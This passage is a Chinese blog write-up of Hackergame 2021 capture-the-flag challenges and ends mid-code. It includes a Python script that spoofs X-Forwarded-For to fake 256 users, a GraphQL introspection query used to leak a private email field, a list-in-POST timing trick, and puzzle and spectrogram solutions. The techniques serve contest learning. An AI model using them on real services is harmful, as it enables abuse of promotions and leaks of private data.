<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>「Hackergame 2021」#2 Writup 开局上分篇 1 - TonyCrane&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="TonyCrane&#039;s Blog"><meta name="msapplication-TileImage" content="/tonycrane.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="TonyCrane&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="&amp;lt; #1 #3 &amp;gt;   这里接上一篇，Writeup 的有：大砍刀、图之上、赛博厨房01、助记词1、p😭q有些虽然偏后、分值高，但是总体并不难"><meta property="og:type" content="blog"><meta property="og:title" content="「Hackergame 2021」#2 Writup 开局上分篇 1"><meta property="og:url" content="https://blog.tonycrane.cc/p/f54b44c.html"><meta property="og:site_name" content="TonyCrane&#039;s Blog"><meta property="og:description" content="&amp;lt; #1 #3 &amp;gt;   这里接上一篇，Writeup 的有：大砍刀、图之上、赛博厨房01、助记词1、p😭q有些虽然偏后、分值高，但是总体并不难"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://blog.tonycrane.cc/p/f54b44c/burp.png"><meta property="og:image" content="https://blog.tonycrane.cc/p/f54b44c/graphiql.png"><meta property="og:image" content="https://blog.tonycrane.cc/p/f54b44c/graphql.png"><meta property="og:image" content="https://blog.tonycrane.cc/p/f54b44c/mnemonic.png"><meta property="article:published_time" content="2021-10-29T03:14:46.000Z"><meta property="article:modified_time" content="2021-10-29T13:50:53.139Z"><meta property="article:author" content="TonyCrane"><meta property="article:tag" content="CTF"><meta property="article:tag" content="Writeup"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/p/f54b44c/burp.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://blog.tonycrane.cc/p/f54b44c.html"},"headline":"「Hackergame 2021」#2 Writup 开局上分篇 1","image":["https://blog.tonycrane.cc/p/f54b44c/burp.png","https://blog.tonycrane.cc/p/f54b44c/graphiql.png","https://blog.tonycrane.cc/p/f54b44c/graphql.png","https://blog.tonycrane.cc/p/f54b44c/mnemonic.png"],"datePublished":"2021-10-29T03:14:46.000Z","dateModified":"2021-10-29T13:50:53.139Z","author":{"@type":"Person","name":"TonyCrane"},"publisher":{"@type":"Organization","name":"TonyCrane's Blog","logo":{"@type":"ImageObject","url":"https://blog.tonycrane.cc/BlogLogo.png"}},"description":"&lt; #1 #3 &gt;   这里接上一篇，Writeup 的有：大砍刀、图之上、赛博厨房01、助记词1、p😭q有些虽然偏后、分值高，但是总体并不难"}</script><link rel="canonical" href="https://blog.tonycrane.cc/p/f54b44c.html"><link rel="icon" href="/tonycrane.png"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css"><link rel="stylesheet" href="https://gcore.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro&amp;family=JetBrains+Mono:ital,wght@0,300;0,400;0,600;0,700;1,400;1,700"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><script>var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?4fb5d144c1a2304049b314651f3033bc";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();</script><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://gcore.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://gcore.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://gcore.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><script src="https://www.googletagmanager.com/gtag/js?id=G-GQ1YD8G8PG" async></script><script>window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
    
        gtag('config', 'G-GQ1YD8G8PG');</script><!--!--><!--!--><script src="https://gcore.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="TonyCrane's Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/BlogLogo.png" alt="TonyCrane&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">主页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/friends">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item colormode" id="colormode" title="颜色主题" href="javascript:;"><i class="fas fa-sun"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-6-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2021-10-29T03:14:46.000Z" title="2021/10/29 11:14:46">2021-10-29</time>发表</span><span class="level-item"><time dateTime="2021-10-29T13:50:53.139Z" title="2021/10/29 21:50:53">2021-10-29</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/Writeup/">Writeup</a></span><span class="level-item">25 分钟读完 (大约3753个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">「Hackergame 2021」#2 Writup 开局上分篇 1</h1><div class="content"><div style="display: flex; justify-content: space-between;">

<p><a href="/p/fd872e78.html">&lt; #1</a></p>
<p><a href="/p/f152ab1f.html">#3 &gt;</a></p>
</div>

<p>这里接<a href="/p/fd872e78.html">上一篇</a>，Writeup 的有：大砍刀、图之上、赛博厨房01、助记词1、p😭q<br>有些虽然偏后、分值高，但是总体并不难</p>
<span id="more"></span>
<hr>
<h2 id="FLAG-助力大红包"><a href="#FLAG-助力大红包" class="headerlink" title="FLAG 助力大红包"></a>FLAG 助力大红包</h2><blockquote>
<p>参与活动，助力抽奖！集满 1 个 flag，即可提取 1 个 flag。</p>
<p>恭喜你积攒到 0.5…… 个 flag，<br>剩余时间：10分00秒</p>
<p>已有 0 位好友为您助力。</p>
<p>将如下链接分享给好友，可以获得好友助力，获得更多 flag：……</p>
</blockquote>
<p><del>老并夕夕了</del>，经过一些测试和看规则可以知道，ip 在同一 /8 网段的用户被视为同一用户，即 ip 地址的第一个点前面的数字不一样才是不同用户<br>再用虚拟机和手机试一下，发现每个用户增加的 flag 数量很小<br>所以推测需要200+个 ip 地址，肯定不会要真的转发，而且也很难凑出很多不在同一 /8 网段的 ip</p>
<p>于是在 BurpSuite 里面抓包可以看到，每次点击“助力”都会发送一个到助力链接的 POST，内容为 ip 地址<br><img src="/p/f54b44c/burp.png"><br>然后将其发送到 Repeater 中，尝试更改 ip 地址，得到的 Response 中说 “失败！检测到前后端检测 IPv4 地址不匹配”</p>
<p>所以仅仅更改 POST 内容的 ip 是不够的，而提供给检测的内容也仅仅是一个 POST，所以可以更改 POST 头，添加 <strong>X-Forwarded-For</strong><br>然后使用 python 就可以循环发送 POST 并伪造 ip 地址得到256个助力了，刚好达到1个flag：<br>（要注意 sleep 一段时间，不然会出现操作过快拒绝的情况；也不要 sleep 过长，否则超过10分钟 flag 就无效了）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">from</span> tqdm <span class="keyword">import</span> tqdm</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://202.38.93.111:10888/invite/...&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> tqdm(total=<span class="number">256</span>) <span class="keyword">as</span> pbar:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        res = requests.post(url, data=&#123;<span class="string">&quot;ip&quot;</span>: <span class="string">f&quot;<span class="subst">&#123;i&#125;</span>.0.0.0&quot;</span>&#125;, headers=&#123;<span class="string">&quot;X-Forwarded-For&quot;</span>: <span class="string">f&quot;<span class="subst">&#123;i&#125;</span>.0.0.0&quot;</span>&#125;)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;成功&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;[x] 失败&quot;</span>)</span><br><span class="line">            <span class="built_in">print</span>(res.text)</span><br><span class="line">        time.sleep(<span class="number">1.5</span>)</span><br><span class="line">        pbar.update(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="图之上的信息"><a href="#图之上的信息" class="headerlink" title="图之上的信息"></a>图之上的信息</h2><blockquote>
<p>小 T 听说 GraphQL 是一种特别的 API 设计模式，也是 RESTful API 的有力竞争者，所以他写了个小网站来实验这项技术。</p>
<p>你能通过这个全新的接口，获取到没有公开出来的管理员的邮箱地址吗？</p>
</blockquote>
<p>题目信息给的很充分，用的是 GraphQL，要用其得到 admin 的邮箱</p>
<p>没接触过 GraphQL，所以直接必应（逃<br>查到了很多有用的东西：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://graphql.cn/">GraphQL官网</a>：了解一下 GraphQL 是干什么的，要怎么用</li>
<li><a target="_blank" rel="noopener" href="https://www.electronjs.org/apps/graphiql">GraphiQL</a>：一个进行 GraphQL 查询的 GUI</li>
<li><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/390876937">【安全记录】玩转GraphQL - DVGA靶场（上）- 知乎</a></li>
<li><a target="_blank" rel="noopener" href="https://apis.guru/graphql-voyager/">GraphQL Voyager</a>：可视化现实 GraphQL 内省出的结构</li>
</ul>
<p>简而言之，GraphQL 就是一个可以通过一次 query 请求查询多个资源的 API 模式，只要 <code>网址/graphql?query=...</code> 就可以实现查询<br>有些使用 GraphQL 的网站可以直接通过访问 <code>网址/graphiql</code> 得到查询的 GUI<br>但是本题中禁止了，但可以使用 GraphiQL 软件来进行查询</p>
<p>在第三个链接中可以了解到，可以利用 GraphQL 的内省查询来泄露出内部的结构，把其中的查询语句丢到 GraphiQL 中可以得到结果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">query IntrospectionQuery &#123; __schema &#123; queryType &#123; name &#125; mutationType &#123; name &#125; subscriptionType &#123; name &#125; types &#123; ...FullType &#125; directives &#123; name description locations args &#123; ...InputValue &#125; &#125; &#125;&#125;fragment FullType on __Type &#123; kind name description fields(includeDeprecated: true) &#123; name description args &#123; ...InputValue &#125; type &#123; ...TypeRef &#125; isDeprecated deprecationReason &#125; inputFields &#123; ...InputValue &#125; interfaces &#123; ...TypeRef &#125; enumValues(includeDeprecated: true) &#123; name description isDeprecated deprecationReason &#125; possibleTypes &#123; ...TypeRef &#125;&#125;fragment InputValue on __InputValue &#123; name description type &#123; ...TypeRef &#125; defaultValue&#125;fragment TypeRef on __Type &#123; kind name ofType &#123; kind name ofType &#123; kind name ofType &#123; kind name ofType &#123; kind name ofType &#123; kind name ofType &#123; kind name ofType &#123; kind name &#125; &#125; &#125; &#125; &#125; &#125; &#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/p/f54b44c/graphiql.png"></p>
<p>然后把结果丢到 GraphQL Voyager 中就可以得到可视化的结构：<br><img src="/p/f54b44c/graphql.png"></p>
<p>所以只需要根据 id query 一下 user 就可以了：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">query &#123; user(<span class="built_in">id</span>: <span class="number">1</span>) &#123; privateEmail, &#125; &#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>&#123;</span><br><span class="line">  <span class="string">&quot;data&quot;</span>: &#123;</span><br><span class="line">    <span class="string">&quot;user&quot;</span>: &#123;</span><br><span class="line">      <span class="string">&quot;privateEmail&quot;</span>: <span class="string">&quot;flag&#123;...&#125;&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="赛博厨房"><a href="#赛博厨房" class="headerlink" title="赛博厨房"></a>赛博厨房</h2><blockquote>
<p>虽然这是你的餐厅，但只有机器人可以在厨房工作。机器人精确地按照程序工作，在厨房中移动，从物品源取出食材，按照菜谱的顺序把食材依次放入锅内。</p>
<p>机器人不需要休息，只需要一个晚上的时间来学习你教给它的程序，在此之后你就可以在任何时候让机器人执行这个程序，程序的每一步执行都会被记录下来，方便你检查机器人做菜的过程。</p>
<p>另外为了符合食品安全法的要求，赛博厨房中的机器人同一时间手里只能拿一种食物，每次做菜前都必须执行清理厨房的操作，把各处的食物残渣清理掉，然后回到厨房角落待命。</p>
<p>每天的菜谱可能不同，但也许也存在一些规律。</p>
<p>对机器人编程可以使用的指令有（n, m 为整数参数，程序的行号从 0 开始，注意指令中需要正确使用空格）：</p>
<blockquote>
<p>向上 n 步<br>向下 n 步<br>向左 n 步<br>向右 n 步<br>放下 n 个物品<br>拿起 n 个物品<br>放下盘子<br>拿起盘子<br>如果手上的物品大于等于 n 向上跳转 m 行<br>如果手上的物品大于等于 n 向下跳转 m 行</p>
</blockquote>
<p>赶紧进入赛博厨房开始做菜吧！</p>
</blockquote>
<p>刚看题还是挺懵的，想了好半天才明白<br>简单说来就是，每天可以编写新的程序，但是只能运行一个之前编写过的程序<br>每个程序只有几种指令可以使用，需要在其中满足菜谱的顺序要求</p>
<p>而问题在于，编写程序后的第二天的菜谱可能会不同，导致前面编写的程序无法使用<br>所以就需要<em>预测</em>第二天的菜谱</p>
<h3 id="Level-0"><a href="#Level-0" class="headerlink" title="Level 0"></a>Level 0</h3><p>可以看到第 0 天的菜谱是 1, 0，也就是要在同一个程序中依次向锅(1,0)中放入 1 号食物(0,2)和 0 号食物(0,1)<br>随便编写程序保存，直接到下一天，可以发现菜谱发生了变化<br>多次尝试之后发现菜谱<strong>只有 0,0 / 0,1 / 1,0 / 1,1 四种</strong></p>
<p>所以在第 0 天编写学习四个程序，到下一天就可以根据菜谱来执行了<br>例如程序 1,0 就可以编写为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">向右 2 步</span><br><span class="line">拿起 1 个物品</span><br><span class="line">向左 2 步</span><br><span class="line">向下 1 步</span><br><span class="line">放下 1 个物品</span><br><span class="line">向上 1 步</span><br><span class="line">向右 1 步</span><br><span class="line">拿起 1 个物品</span><br><span class="line">向左 1 步</span><br><span class="line">向下 1 步</span><br><span class="line">放下 1 个物品</span><br><span class="line">向上 1 步</span><br></pre></td></tr></table></figure>
<p>只要正确了一天，就可以拿到 flag 了</p>
<h3 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h3><p>只有 1 个食物，菜谱是好多 0<br>同样随便编写程序保存进入下一天，发现菜谱<strong>没有变化</strong>，还是 73 个 0<br>所以这一关可能只是循环的教程<br>可用的指令中有一条 “如果手上的物品大于等于 n 向上跳转 m 行”<br>可以用它来达到<strong>循环</strong>的效果</p>
<p>只需要拿 73 个物品，然后循环放下直到手中没有了即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">向右 1 步</span><br><span class="line">拿起 73 个物品</span><br><span class="line">向左 1 步</span><br><span class="line">向下 1 步</span><br><span class="line">放下 1 个物品</span><br><span class="line">如果手上的物品大于等于 1 向上跳转 1 行</span><br></pre></td></tr></table></figure>
<p>同样保存下一天执行就可以拿到 flag 了 </p>
<p><del>剩下的两个看起来大概是通过源码来推测出菜谱的生成方法，然后编写相应的指令，太难了，不会qwq</del></p>
<hr>
<h2 id="助记词"><a href="#助记词" class="headerlink" title="助记词"></a>助记词</h2><p>题目有效内容：</p>
<blockquote>
<p>你的室友终于连夜赶完了他的 Java 语言程序设计的课程大作业。看起来他使用 Java 17 写了一个保存助记词的后端，当然还有配套的前端。助记词由四个英文单词组成，每个用户最多保存 32 条。</p>
<p>你从他充满激情却又夹杂不清的表述中得知，他似乎还为此专门在大作业里藏了两个 flag：当访问延迟达到两个特殊的阈值时，flag 便会打印出来，届时你便可以拿着 flag 让你的室友请你吃一顿大餐。</p>
</blockquote>
<p>下载到源码后翻一翻，有用的就只有 Phrase.java 和 Instance.java<br>其中 Phrase.java 定义了 Phrase，其中重载了 <code>equals</code> 方法，其中有：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    TimeUnit.MILLISECONDS.sleep(EQUALS_DURATION_MILLIS); <span class="comment">// 20ms</span></span><br><span class="line">    <span class="comment">// <span class="doctag">TODO:</span> remove it since it is for debugging</span></span><br><span class="line">&#125; <span class="keyword">catch</span> (InterruptedException e) &#123;</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> RuntimeException(e);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>所以在每次比较相等的时候就会 sleep 20ms </p>
<p>而 Instance.java 的 post 方法中对于每次的输入，遍历输入的列表，然后逐个加进 HashMap 中<br>在加入 HashMap 的时候就涉及到判断是否相等<br>而最终会判断在完成前后的总的时间间隔是多少，如果大于 600ms 就提取出第一个 flag：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> modified = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">var</span> before = System.nanoTime();</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; input.length() &amp;&amp; i &lt; MAX_PHRASES &amp;&amp; phrases.size() &lt; MAX_PHRASES; ++i) &#123;</span><br><span class="line">    <span class="keyword">var</span> text = input.optString(i, <span class="string">&quot;&quot;</span>).toLowerCase(Locale.ENGLISH);</span><br><span class="line">    modified += phrases.add(Phrase.create(<span class="keyword">this</span>.mnemonics, text, token)) ? <span class="number">1</span> : <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// 这里会 sleep</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">var</span> after = System.nanoTime();</span><br><span class="line"><span class="keyword">var</span> duration = TimeUnit.MILLISECONDS.convert(after - before, TimeUnit.NANOSECONDS);</span><br><span class="line"><span class="keyword">if</span> (duration &gt; FLAG1_DURATION_MILLIS) &#123; <span class="comment">// 600ms</span></span><br><span class="line">    token.addFlag(<span class="number">1</span>, flag -&gt; output.put(<span class="string">&quot;flag1&quot;</span>, flag));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>而在网页中添加条目的时候，一次只能添加一条，也就是一个 POST 里面只有一个 Phrase<br>但是源码中有一个循环，遍历整个 input，所以一个 POST 里的内容其实是一个列表<br>所以可以用 BurpSuite 获取 POST 然后更改一下内容再发送出去（先 random 一个，然后 add）<br><img src="/p/f54b44c/mnemonic.png"><br>根据 flag 里的提示，正解（第二顿大餐）应该是使用哈希碰撞，<del>但是不会</del></p>
<hr>
<h2 id="p😭q"><a href="#p😭q" class="headerlink" title="p😭q"></a>p😭q</h2><blockquote>
<p>学会傅里叶的一瞬间，悔恨的泪水流了下来。</p>
<p>当我看到音频播放器中跳动的频谱动画，月明星稀的夜晚，深邃的银河，只有天使在浅吟低唱，复杂的情感于我眼中溢出，像是沉入了雾里朦胧的海一样的温柔。</p>
<p>这一刻我才知道，耳机音响也就图一乐，真听音乐还得靠眼睛。</p>
<p>（注意：flag 花括号内是一个 12 位整数，由 0-9 数位组成，没有其它字符。）</p>
</blockquote>
<p>虽然这题是在倒数第三题，还值 400pt，<del>但你一说傅里叶我可就不困了嗷</del></p>
<p>下载题目包，有一个生成 gif 的 py 代码和那个 gif 文件<br>正好前面的电波也有一段音频，可以用那个带入到 generate_sound_visualization.py 中生成一个 gif，然后用这个来测试</p>
<p>再仔细看一看 generate_sound_visualization.py 这个文件<br>主要使用了 <code>librosa</code>，于是就可以翻<a target="_blank" rel="noopener" href="https://librosa.org/doc/latest/index.html">文档</a>来看懂这个程序：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">y, sample_rate = librosa.load(<span class="string">&quot;flag.mp3&quot;</span>) <span class="comment"># 从mp3中读取数据和采样率</span></span><br><span class="line"></span><br><span class="line">spectrogram = numpy.around( <span class="comment"># 四舍五入，但会造成逆向的时候有少许误差导致杂音</span></span><br><span class="line">    librosa.power_to_db( <span class="comment"># 把以功率为单位的频谱图转换为以分贝为单位</span></span><br><span class="line">        librosa.feature.melspectrogram( <span class="comment"># 通过音频数据和采样率计算梅尔频谱</span></span><br><span class="line">            y, sample_rate, n_mels=num_freqs,</span><br><span class="line">            n_fft=fft_window_size, </span><br><span class="line">            hop_length=frame_step_size, </span><br><span class="line">            window=window_function_type</span><br><span class="line">        )</span><br><span class="line">    ) / quantize <span class="comment"># 除以2</span></span><br><span class="line">) * quantize <span class="comment"># 乘以2</span></span><br></pre></td></tr></table></figure>

<p>然后又通过一些 <code>numpy</code> 的骚操作来生成每一帧的数据，然后通过 <code>array2gif</code> 包的 write_gif 函数来生成 gif </p>
<p>所以主要思路就是把整个程序<strong>完整地逆过来</strong></p>
<p>由于必应没有查到 <code>gif2array</code> 的包，所以读取 gif 就用了经典 <code>PIL.Image</code>：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line">file = Image.<span class="built_in">open</span>(<span class="string">&quot;flag.gif&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        gif_data.append(np.array(file))</span><br><span class="line">        file.seek(file.tell() + <span class="number">1</span>)</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] Read gif file&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>然后是解决那一大段 numpy 骚操作的逆骚操作（<br>但是数理基础这么差的我当然是不想仔细研究了，所以直接用电波那题的 radio.mp3 带入，看一看要得到的 spectrogram 是什么样子<br>输出得到的 spectrogram 是：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[[-<span class="number">58.</span> -<span class="number">48.</span> -<span class="number">30.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">44.</span> -<span class="number">26.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">40.</span> -<span class="number">16.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> ...</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">42.</span> -<span class="number">30.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">44.</span> -<span class="number">32.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">46.</span> -<span class="number">34.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]]</span><br></pre></td></tr></table></figure>
<p>而转置过来是：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[[-<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> [-<span class="number">48.</span> -<span class="number">44.</span> -<span class="number">40.</span> ... -<span class="number">42.</span> -<span class="number">44.</span> -<span class="number">46.</span>]</span><br><span class="line"> [-<span class="number">30.</span> -<span class="number">26.</span> -<span class="number">16.</span> ... -<span class="number">30.</span> -<span class="number">32.</span> -<span class="number">34.</span>]</span><br><span class="line"> ...</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]</span><br><span class="line"> [-<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span> ... -<span class="number">58.</span> -<span class="number">58.</span> -<span class="number">58.</span>]]</span><br></pre></td></tr></table></figure>
<p>减去 min_db=-60 第一行正好是 2，第二行是 [12. 16. 20. … 18. 16. 14.]<br>再对应到生成的 gif 文件中，可以看出 gif 的第一帧每个矩形的高度都是 2<br>而第二帧每个矩形的高度也恰好是刚得出的那组数<br>所以要得到的 spectrogram 就是 <strong>gif 每一帧所有矩形的高度构成的矩阵的转置</strong></p>
<p>再结合源码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">numpy.array([</span><br><span class="line">    [</span><br><span class="line">        red_pixel <span class="keyword">if</span> freq % <span class="number">2</span> <span class="keyword">and</span> <span class="built_in">round</span>(frame[freq // <span class="number">2</span>]) &gt; threshold <span class="keyword">else</span> white_pixel </span><br><span class="line">        <span class="keyword">for</span> threshold <span class="keyword">in</span> <span class="built_in">list</span>(<span class="built_in">range</span>(min_db, max_db + <span class="number">1</span>, quantize))[::-<span class="number">1</span>]</span><br><span class="line">    ] </span><br><span class="line">    <span class="keyword">for</span> freq <span class="keyword">in</span> <span class="built_in">range</span>(num_freqs * <span class="number">2</span> + <span class="number">1</span>)</span><br><span class="line">])</span><br></pre></td></tr></table></figure>
<p>可以看出，每个矩形加上左边的空格正好是 4 个像素，所以每四列读取最后一列即可：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">spectrogramT = []</span><br><span class="line"><span class="keyword">for</span> data <span class="keyword">in</span> gif_data:</span><br><span class="line">    res = []</span><br><span class="line">    <span class="keyword">for</span> ind, line <span class="keyword">in</span> <span class="built_in">enumerate</span>(data.transpose()): <span class="comment"># 将每一帧转置，方便计算</span></span><br><span class="line">        num = <span class="built_in">sum</span>(line) <span class="comment"># 计算每个矩形的高度（转置后是宽度）</span></span><br><span class="line">        <span class="keyword">if</span> ind % <span class="number">4</span> == <span class="number">3</span>:</span><br><span class="line">            res.append(num + min_db) <span class="comment"># 